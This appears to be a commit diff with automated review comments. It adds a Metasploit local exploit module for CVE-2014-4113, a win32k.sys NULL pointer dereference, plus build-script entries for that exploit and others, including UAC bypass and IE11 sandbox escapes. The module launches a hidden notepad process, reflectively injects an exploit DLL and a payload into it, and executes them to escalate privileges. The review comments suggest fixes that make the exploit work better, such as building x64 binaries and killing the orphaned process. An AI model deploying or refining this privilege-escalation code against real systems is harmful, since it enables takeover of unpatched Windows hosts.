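Review bot: The `x64` target at the end of this file only prints `CVE-2014-4113 is not supported in x64` and `all` depends on `x86` alone, so running `make.msbuild /target:x64` (the form the build batch file in this commit uses through `/target:%PLAT%`) produces no 64-bit DLL, even though the solution added alongside defines a `Release|x64` configuration and the C source carries `_M_X64` code paths. If the x64 binary is deliberately shipped prebuilt rather than built here, the message should say so; otherwise the target body can become `<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>` with `DependsOnTargets="x86;x64"` on `all`. Whether the prebuilt route is intended is not visible from the page, so this is a question for the author as much as a defect.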
@ -47,6 +47,13 @@ IF "%ERRORLEVEL%"=="0" (
|
|||
POPD
|
||||
)
|
||||
|
||||
IF "%ERRORLEVEL%"=="0" (
|
||||
ECHO "Building CVE-2014-4113 (win32k_null_page)"
|
||||
PUSHD CVE-2014-4113
|
||||
msbuild.exe make.msbuild /target:%PLAT%
|
||||
POPD
|
||||
)
|
||||
|
||||
IF "%ERRORLEVEL%"=="0" (
|
||||
ECHO "Building CVE-2013-1300 (schlamperei)"
|
||||
PUSHD CVE-2013-1300
|
||||
|
@ -60,8 +67,8 @@ IF "%ERRORLEVEL%"=="0" (
|
|||
msbuild.exe make.msbuild /target:%PLAT%
|
||||
POPD
|
||||
|
||||
)
|
||||
|
||||
)
|
||||
|
||||
IF "%ERRORLEVEL%"=="0" (
|
||||
ECHO "Building bypassuac (in-memory)"
|
||||
PUSHD bypassuac_injection
|
||||
|
@ -69,8 +76,8 @@ IF "%ERRORLEVEL%"=="0" (
|
|||
POPD
|
||||
)
|
||||
|
||||
)
|
||||
|
||||
)
|
||||
|
||||
IF "%ERRORLEVEL%"=="0" (
|
||||
ECHO "Building IE11 Sandbox bypasses"
|
||||
PUSHD IE11SandboxEscapes
|
||||
|
|
|
@ -0,0 +1,158 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/post/windows/reflective_dll_injection'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::FileInfo
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
|
||||
'Description' => %q{
|
||||
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
|
||||
can be triggered through the use of TrackPopupMenu. Under special conditions, the
|
||||
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
|
||||
code execution. This module has been tested successfully on Windows XP SP3, Windows
|
||||
2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
|
||||
2008 R2 SP1 64 bits.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # vulnerability discovery and exploit in the wild
|
||||
'juan vazquez', # msf module (x86 target)
|
||||
'Spencer McIntyre' # msf module (x64 target)
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested on (32 bits):
|
||||
# * Windows XP SP3
|
||||
# * Windows 2003 SP2
|
||||
# * Windows 7 SP1
|
||||
# * Windows 2008
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
# Tested on (64 bits):
|
||||
# * Windows 7 SP1
|
||||
# * Windows 2008 R2 SP1
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4096,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-4113'],
|
||||
['OSVDB', '113167'],
|
||||
['BID', '70364'],
|
||||
['MSB', 'MS14-058'],
|
||||
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 14 2014',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
end
|
||||
|
||||
def check
|
||||
os = sysinfo["OS"]
|
||||
|
||||
if os !~ /windows/i
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /(wow|x)64/i
|
||||
arch = ARCH_X86_64
|
||||
elsif sysinfo["Architecture"] =~ /x86/i
|
||||
arch = ARCH_X86
|
||||
end
|
||||
|
||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
||||
major, minor, build, revision, branch = file_version(file_path)
|
||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
||||
|
||||
# Neither target suports Windows 8 or 8.1
|
||||
return Exploit::CheckCode::Safe if build == 9200
|
||||
return Exploit::CheckCode::Safe if build == 9600
|
||||
|
||||
if arch == ARCH_X86
|
||||
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
|
||||
else
|
||||
return Exploit::CheckCode::Detected if build == 7601
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
if is_system?
|
||||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if check == Exploit::CheckCode::Safe
|
||||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
|
||||
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||
end
|
||||
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
|
||||
begin
|
||||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
# Reader Sandbox won't allow to create a new process:
|
||||
# stdapi_sys_process_execute: Operation failed: Access is denied.
|
||||
print_status('Operation failed. Trying to elevate the current process...')
|
||||
process = client.sys.process.open
|
||||
end
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
if target.arch.first == ARCH_X86
|
||||
dll_file_name = 'cve-2014-4113.x86.dll'
|
||||
else
|
||||
dll_file_name = 'cve-2014-4113.x64.dll'
|
||||
end
|
||||
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
print_status("Injecting exploit into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
payload_mem = inject_into_process(process, payload.encoded)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
# we want invoked on successful exploitation.
|
||||
print_status('Payload injected. Executing exploit...')
|
||||
process.thread.create(exploit_mem + offset, payload_mem)
|
||||
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
end
|
||||
|
||||
end
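Review bot: `check` leaves `arch` unset when `sysinfo["Architecture"]` matches neither `/(wow|x)64/i` nor `/x86/i`, and the closing `if arch == ARCH_X86 ... else` then silently evaluates an unidentified architecture in the x64 branch; an explicit `return Exploit::CheckCode::Unknown if arch.nil?` before the `file_version` lookup would make that fallthrough deliberate instead of accidental. In `exploit`, the hidden `notepad.exe` started by `client.sys.process.execute` is never closed or killed after `process.thread.create`, and if `client.sys.process.open` raises after the execute succeeded, the rescue path falls back to the current process while the orphaned notepad keeps running, so a short cleanup (`process.close` / `client.sys.process.kill(notepad_process.pid)` in an `ensure`) would be appropriate where the module is done with it. Two smaller points of style: the failure constants are qualified inconsistently (`Exploit::Failure::None` on one line, `Failure::NoTarget` on the others), and the comment `# Neither target suports Windows 8 or 8.1` should read `# Neither target supports Windows 8 or 8.1`.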
|